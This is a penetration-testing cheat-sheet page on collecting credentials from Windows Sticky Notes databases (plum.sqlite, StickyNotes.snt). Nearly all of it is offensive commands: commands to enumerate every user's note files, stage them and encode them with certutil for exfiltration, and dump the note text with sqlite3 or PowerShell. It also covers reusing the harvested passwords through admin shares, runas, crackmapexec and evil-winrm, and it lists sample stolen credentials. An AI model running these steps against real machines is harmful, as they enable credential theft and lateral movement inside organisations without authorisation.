Sticky Notes - BookJMP

Overview

The Windows Sticky Notes application stores user notes locally in a database file. Users frequently save credentials, VPN keys, server IPs, and internal information in their notes. This makes it a valuable post-exploitation and privilege escalation enumeration target.

File Locations

Windows 10 (1607+) & Windows 11

C:\Users\%USERNAME%\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState

Main database:

plum.sqlite

Windows 10 (1507 / 1511), Windows 8, Windows 7

C:\Users\%USERNAME%\AppData\Roaming\Microsoft\StickyNotes

Main file:

StickyNotes.snt

Why This Matters

Users commonly store:

Domain credentials
RDP passwords
VPN credentials
Database credentials
API keys
Internal URLs
Administrator notes

This often leads directly to privilege escalation or lateral movement.

Quick Loot

Find all Sticky Notes files

Get-ChildItem -Path C:\Users\ -Recurse -Include plum.sqlite,StickyNotes.snt -ErrorAction SilentlyContinue

From a low-privilege shell

dir C:\Users\*\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite /s
dir C:\Users\*\AppData\Roaming\Microsoft\StickyNotes\StickyNotes.snt /s

Extract Data: Windows 10/11 (SQLite)

Copy file

copy plum.sqlite C:\Windows\Temp\notes.db

Or exfiltrate:

certutil -encode plum.sqlite notes.txt

Read locally (attacker machine)

sqlite3 notes.db
.tables
SELECT Text FROM Note;

Quick dump

sqlite3 notes.db "SELECT Text FROM Note;"

Extract Data: Windows 7 / 8 / Early 10 (SNT)

The .snt file is an OLE structured storage file.

Convert using strings

strings StickyNotes.snt

Credentials often appear in plaintext.

Using oledump

oledump.py StickyNotes.snt

PowerShell Live Dump (no file copy)

Add-Type -AssemblyName System.Data.SQLite
$sql = "SELECT Text FROM Note"
$db = "C:\Users\USER\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite"
$conn = New-Object System.Data.SQLite.SQLiteConnection("Data Source=$db;Version=3;")
$conn.Open()
$cmd = $conn.CreateCommand()
$cmd.CommandText = $sql
$reader = $cmd.ExecuteReader()
while ($reader.Read()) { $reader["Text"] }
$conn.Close()

Post-Exploitation Use

After obtaining credentials:

Test local admin reuse

net use \\TARGET\C$ /user:Administrator PASSWORD

RunAs

runas /user:DOMAIN\admin cmd

SMB Exec / WinRM

crackmapexec smb targets.txt -u user -p password
evil-winrm -i target -u user -p password

Typical Findings

Examples commonly discovered in engagements:

VPN: vpn.corp.local
User: administrator
Pass: Winter2024!

DB:
10.0.10.15
root / P@ssw0rd!

RDP Server:
SRV-FILE01
corp\backup-admin
Backup123!

Documentation Index

​Overview

​File Locations

​Windows 10 (1607+) & Windows 11

​Windows 10 (1507 / 1511), Windows 8, Windows 7

​Why This Matters

​Quick Loot

​Find all Sticky Notes files

​From a low-privilege shell

​Extract Data: Windows 10/11 (SQLite)

​Copy file

​Read locally (attacker machine)

​Quick dump

​Extract Data: Windows 7 / 8 / Early 10 (SNT)

​Convert using strings

​Using oledump

​PowerShell Live Dump (no file copy)

​Post-Exploitation Use

​Test local admin reuse

​RunAs

​SMB Exec / WinRM

​Typical Findings